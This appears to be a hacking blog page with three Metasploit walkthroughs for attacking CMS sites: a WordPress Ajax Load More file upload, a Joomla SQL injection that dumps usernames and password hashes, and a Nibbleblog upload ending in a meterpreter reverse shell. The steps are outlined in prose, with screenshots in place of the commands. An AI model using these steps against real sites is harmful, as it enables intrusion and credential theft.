CMS hacking

Good Evening Friends. In our previous howto, we have seen how to use Joomla com_contenthistory Error-Based SQL Injection exploit. Today we will see how to exploit the WordPress Ajax Loadmore PHP upload vulnerability using Metasploit. This module exploits an arbitrary file upload in the WordPress Ajax Load More plugin version 2.8.1.1. I have tested this exploit on the above said plugin in WordPress version 4.1.3 on Windows.  The only offside is this exploit requires credentials. Start Metasploit and load the exploit as shown below.

wpajaxfu1

Set payload as below.

wpajaxfu2

Type command “show options” to see the required options for this exploit.

wpajaxfu3

Set the required options as shown below. Set the remote IP address, targeturi, password and username as shown below.

wpajaxfu4

After setting all the options, check whether once again as shown below.

wpajaxfu5

Type command “exploit” and we will get the meterpreter session as shown below.

wpajaxfu6

 

Good Evening Friends. Today we will see how to exploit the “Joomla Error-Based SQL Injection” vulnerability found recently to enumerate usernames and password hashes found in remote servers where Joomla is installed. This vulnerability is found in Joomla versions 3.2 to 3.4.4. Now let’s see how to use this exploit to enumerate usernames and password hashes. This exploit is available in Metasploit. I am testing this exploit on Joomla version 3.4.4.

joomla error-based sql injection0

Start Metasploit and load the exploit as shown below.

joomla error-based sql injection1

Set the required options as shown below and type command “exploit”. After some time, a text file containing usernames and password hashes is downloaded and stored in your system as shown below.

joomla error-based sql injection3

Now open the text file with any text editor available in kali Linux. I have used gedit.

joomla3

This is the text file we have downloaded. As you can see below, we can see usernames and password hashes of the joomla installation.

joomla error-based sql injection4

Good Evening Friends. Recently Metasploit released an exploit for the Nibbleblog file upload vulnerabiltiy. To those people who don’t know what is Nibbleblog it is a powerful engine for creating blogs.  In fact we can say it is the simplest blog creation system. In this scenario, we will hack a remote system which is using Nibblebog 4.0.3. We will upload a file into the remote system using nibbleblog File upload vulnerabilty. The only downside of this exploit is that it requires credentials. Update Metasploit and start it. Type command “search nibbleblog” to search for all exploits related to nibbleblog as shown below.

nibbleblog1

Load the exploit as shown below.

nibbleblog2

Set all the options required as shown below. I am running nibbleblog on my wamp server on another system. So I am giving its IP address below.

nibbleblog3

Type command “show payloads” to see the payloads available for this system. You will see all the available options as shown below.

nibbleblog4

Choose the payload “php/meterpreter/reverse_tcp”.

nibbleblog5

Set the required options. i.e lhost which is IP address of your Kali machine. As I already told you, we need the credentials of the blog we wanna hack. Type command “exploit“.  Eventhough you get error as shown below, don’t worry, your exploit has successfully run. The file has been uploaded.

nibbleblog6

Now we have start a listener to listen to our reverse_tcp connection. Load the listener exploit as shown below. Set all the required options as shown.

nibbleblog7

Type command “exploit“. The exploit will run and stop at the shown below stage.

nibbleblog8

Now open browser. The file you just uploaded is saved by default as image.php in the remote system. Now go to the exact path as highlighted below. The only thing that may change for you is IP address. Hit on enter.

nibbleblog9

Now if you go back to the terminal, You should have already got meterpreter session as shown below. Happy Hacking.

nibbleblog10

Hope it was helpful.